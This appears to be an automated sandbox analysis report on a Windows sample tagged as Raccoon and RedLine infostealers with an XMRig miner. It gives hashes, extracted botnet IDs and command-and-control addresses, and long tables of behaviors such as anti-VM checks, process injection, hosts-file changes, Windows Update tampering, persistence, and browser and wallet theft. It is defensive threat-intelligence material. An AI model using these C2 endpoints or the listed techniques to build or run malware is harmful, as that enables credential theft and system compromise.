raccoon | b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f

Analysis

max time kernel
308s
max time network
314s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
19-10-2022 22:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe
Size

344KB
MD5

930e1d08274335cfa68cc418b2b77ba8
SHA1

3b3d5eb936b2ac28acb9effebf9b4e6684dac255
SHA256

b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f
SHA512

d64f550b75b362e25f7d4dffa4a6310ef9a4e7f6f2a29673e2f7cef060888df66816055d695bdfeda557b83b17c7677d6f1b8e2682da603fb04825cbc8dc6cce
SSDEEP

6144:PVtRNV51UBow3Dz6Qp/ezQyeIohuPkvhONffuOlmbP/:HHtEz6KyeIoA3Ni

Score

10^/10

raccoon redline xmrig 72aed310d11382f82b5918621baa858c 875784825 discovery evasion infostealer miner spyware stealer themida trojan upx

Malware Config

Extracted

Family

raccoon

Botnet

72aed310d11382f82b5918621baa858c

http://77.73.133.7/

rc4.plain

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/99756-587-0x00000000047C972E-mapping.dmp	family_redline
behavioral2/memory/99756-628-0x00000000047B0000-0x00000000047CE000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

updater.exesetup.exesetup32.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/8024-1502-0x00007FF7B8020000-0x00007FF7B8814000-memory.dmp	xmrig
behavioral2/memory/8024-1503-0x00007FF7B8020000-0x00007FF7B8814000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

15 792 WScript.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup32.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup32.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 8 IoCs

Processes:

setup.exesetup32.exeMoUSO.exesetup3221.exe222.exe2.0.2-beta.exewatchdog.exeupdater.exe

pid process

4752 setup.exe
4008 setup32.exe
1356 MoUSO.exe
4284 setup3221.exe
4980 222.exe
1576 2.0.2-beta.exe
4128 watchdog.exe
5116 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
15	792	WScript.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup32.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/8024-1502-0x00007FF7B8020000-0x00007FF7B8814000-memory.dmp	upx
behavioral2/memory/8024-1503-0x00007FF7B8020000-0x00007FF7B8814000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exesetup.exesetup32.exeMoUSO.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Wine	setup.exe
Key opened	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Wine	MoUSO.exe

Loads dropped DLL 3 IoCs

Processes:

2.0.2-beta.exe

pid process

1576 2.0.2-beta.exe
1576 2.0.2-beta.exe
1576 2.0.2-beta.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1576	2.0.2-beta.exe
1576	2.0.2-beta.exe
1576	2.0.2-beta.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4008-231-0x00007FF7B43C0000-0x00007FF7B5059000-memory.dmp	themida
behavioral2/memory/4008-555-0x00007FF7B43C0000-0x00007FF7B5059000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4008-764-0x00007FF7B43C0000-0x00007FF7B5059000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/5116-783-0x00007FF6A48C0000-0x00007FF6A5559000-memory.dmp	themida
behavioral2/memory/5116-901-0x00007FF6A48C0000-0x00007FF6A5559000-memory.dmp	themida
behavioral2/memory/5116-1498-0x00007FF6A48C0000-0x00007FF6A5559000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup32.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup32.exeMoUSO.exeupdater.exe

pid process

4752 setup.exe
4008 setup32.exe
1356 MoUSO.exe
5116 updater.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 1736 set thread context of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 4128 set thread context of 99756	4128	watchdog.exe	vbc.exe
PID 5116 set thread context of 7884	5116	updater.exe	conhost.exe
PID 5116 set thread context of 8024	5116	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

cmd.exesetup32.exeupdater.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	setup32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4816 sc.exe
1780 sc.exe
6696 sc.exe
6748 sc.exe
1496 sc.exe
372 sc.exe
668 sc.exe
6644 sc.exe
6712 sc.exe
6732 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3560 schtasks.exe

pid	process
4816	sc.exe
1780	sc.exe
6696	sc.exe
6748	sc.exe
1496	sc.exe
372	sc.exe
668	sc.exe
6644	sc.exe
6712	sc.exe
6732	sc.exe

pid	process
3560	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

setup3221.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings setup3221.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	setup3221.exe

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exeMoUSO.exe

pid	process
4752	setup.exe
4752	setup.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe
1356	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636

pid	process
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exevbc.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	99952	powershell.exe
Token: SeIncreaseQuotaPrivilege	99952	powershell.exe
Token: SeSecurityPrivilege	99952	powershell.exe
Token: SeTakeOwnershipPrivilege	99952	powershell.exe
Token: SeLoadDriverPrivilege	99952	powershell.exe
Token: SeSystemProfilePrivilege	99952	powershell.exe
Token: SeSystemtimePrivilege	99952	powershell.exe
Token: SeProfSingleProcessPrivilege	99952	powershell.exe
Token: SeIncBasePriorityPrivilege	99952	powershell.exe
Token: SeCreatePagefilePrivilege	99952	powershell.exe
Token: SeBackupPrivilege	99952	powershell.exe
Token: SeRestorePrivilege	99952	powershell.exe
Token: SeShutdownPrivilege	99952	powershell.exe
Token: SeDebugPrivilege	99952	powershell.exe
Token: SeSystemEnvironmentPrivilege	99952	powershell.exe
Token: SeRemoteShutdownPrivilege	99952	powershell.exe
Token: SeUndockPrivilege	99952	powershell.exe
Token: SeManageVolumePrivilege	99952	powershell.exe
Token: 33	99952	powershell.exe
Token: 34	99952	powershell.exe
Token: 35	99952	powershell.exe
Token: 36	99952	powershell.exe
Token: SeDebugPrivilege	99756	vbc.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeShutdownPrivilege	800	powercfg.exe
Token: SeCreatePagefilePrivilege	800	powercfg.exe
Token: SeShutdownPrivilege	540	powercfg.exe
Token: SeCreatePagefilePrivilege	540	powercfg.exe
Token: SeShutdownPrivilege	1208	powercfg.exe
Token: SeCreatePagefilePrivilege	1208	powercfg.exe
Token: SeShutdownPrivilege	1856	powercfg.exe
Token: SeCreatePagefilePrivilege	1856	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2656	powershell.exe
Token: SeSecurityPrivilege	2656	powershell.exe
Token: SeTakeOwnershipPrivilege	2656	powershell.exe
Token: SeLoadDriverPrivilege	2656	powershell.exe
Token: SeSystemProfilePrivilege	2656	powershell.exe
Token: SeSystemtimePrivilege	2656	powershell.exe
Token: SeProfSingleProcessPrivilege	2656	powershell.exe
Token: SeIncBasePriorityPrivilege	2656	powershell.exe
Token: SeCreatePagefilePrivilege	2656	powershell.exe
Token: SeBackupPrivilege	2656	powershell.exe
Token: SeRestorePrivilege	2656	powershell.exe
Token: SeShutdownPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeSystemEnvironmentPrivilege	2656	powershell.exe
Token: SeRemoteShutdownPrivilege	2656	powershell.exe
Token: SeUndockPrivilege	2656	powershell.exe
Token: SeManageVolumePrivilege	2656	powershell.exe
Token: 33	2656	powershell.exe
Token: 34	2656	powershell.exe
Token: 35	2656	powershell.exe
Token: 36	2656	powershell.exe
Token: SeIncreaseQuotaPrivilege	2656	powershell.exe
Token: SeSecurityPrivilege	2656	powershell.exe
Token: SeTakeOwnershipPrivilege	2656	powershell.exe
Token: SeLoadDriverPrivilege	2656	powershell.exe
Token: SeSystemProfilePrivilege	2656	powershell.exe
Token: SeSystemtimePrivilege	2656	powershell.exe
Token: SeProfSingleProcessPrivilege	2656	powershell.exe
Token: SeIncBasePriorityPrivilege	2656	powershell.exe
Token: SeCreatePagefilePrivilege	2656	powershell.exe
Token: SeBackupPrivilege	2656	powershell.exe
Token: SeRestorePrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exeRegSvcs.exesetup.exesetup3221.exe222.exewatchdog.exesetup32.execmd.execmd.exe

description	pid	process	target process
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 1736 wrote to memory of 3800	1736	b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe	RegSvcs.exe
PID 3800 wrote to memory of 4752	3800	RegSvcs.exe	setup.exe
PID 3800 wrote to memory of 4752	3800	RegSvcs.exe	setup.exe
PID 3800 wrote to memory of 4752	3800	RegSvcs.exe	setup.exe
PID 4752 wrote to memory of 3560	4752	setup.exe	schtasks.exe
PID 4752 wrote to memory of 3560	4752	setup.exe	schtasks.exe
PID 4752 wrote to memory of 3560	4752	setup.exe	schtasks.exe
PID 3800 wrote to memory of 4008	3800	RegSvcs.exe	setup32.exe
PID 3800 wrote to memory of 4008	3800	RegSvcs.exe	setup32.exe
PID 3800 wrote to memory of 4284	3800	RegSvcs.exe	setup3221.exe
PID 3800 wrote to memory of 4284	3800	RegSvcs.exe	setup3221.exe
PID 3800 wrote to memory of 4284	3800	RegSvcs.exe	setup3221.exe
PID 4284 wrote to memory of 792	4284	setup3221.exe	WScript.exe
PID 4284 wrote to memory of 792	4284	setup3221.exe	WScript.exe
PID 4284 wrote to memory of 792	4284	setup3221.exe	WScript.exe
PID 4284 wrote to memory of 4980	4284	setup3221.exe	222.exe
PID 4284 wrote to memory of 4980	4284	setup3221.exe	222.exe
PID 4284 wrote to memory of 4980	4284	setup3221.exe	222.exe
PID 4980 wrote to memory of 1576	4980	222.exe	2.0.2-beta.exe
PID 4980 wrote to memory of 1576	4980	222.exe	2.0.2-beta.exe
PID 4980 wrote to memory of 1576	4980	222.exe	2.0.2-beta.exe
PID 3800 wrote to memory of 4128	3800	RegSvcs.exe	watchdog.exe
PID 3800 wrote to memory of 4128	3800	RegSvcs.exe	watchdog.exe
PID 3800 wrote to memory of 4128	3800	RegSvcs.exe	watchdog.exe
PID 4128 wrote to memory of 99756	4128	watchdog.exe	vbc.exe
PID 4128 wrote to memory of 99756	4128	watchdog.exe	vbc.exe
PID 4128 wrote to memory of 99756	4128	watchdog.exe	vbc.exe
PID 4128 wrote to memory of 99756	4128	watchdog.exe	vbc.exe
PID 4128 wrote to memory of 99756	4128	watchdog.exe	vbc.exe
PID 4008 wrote to memory of 99952	4008	setup32.exe	powershell.exe
PID 4008 wrote to memory of 99952	4008	setup32.exe	powershell.exe
PID 4008 wrote to memory of 3888	4008	setup32.exe	cmd.exe
PID 4008 wrote to memory of 3888	4008	setup32.exe	cmd.exe
PID 4008 wrote to memory of 4944	4008	setup32.exe	cmd.exe
PID 4008 wrote to memory of 4944	4008	setup32.exe	cmd.exe
PID 4008 wrote to memory of 2656	4008	setup32.exe	powershell.exe
PID 4008 wrote to memory of 2656	4008	setup32.exe	powershell.exe
PID 3888 wrote to memory of 4816	3888	cmd.exe	sc.exe
PID 3888 wrote to memory of 4816	3888	cmd.exe	sc.exe
PID 4944 wrote to memory of 800	4944	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 800	4944	cmd.exe	powercfg.exe
PID 3888 wrote to memory of 1780	3888	cmd.exe	sc.exe
PID 4944 wrote to memory of 540	4944	cmd.exe	powercfg.exe
PID 3888 wrote to memory of 1780	3888	cmd.exe	sc.exe
PID 4944 wrote to memory of 540	4944	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 1208	4944	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 1208	4944	cmd.exe	powercfg.exe
PID 3888 wrote to memory of 1496	3888	cmd.exe	sc.exe
PID 3888 wrote to memory of 1496	3888	cmd.exe	sc.exe
PID 3888 wrote to memory of 372	3888	cmd.exe	sc.exe
PID 3888 wrote to memory of 372	3888	cmd.exe	sc.exe
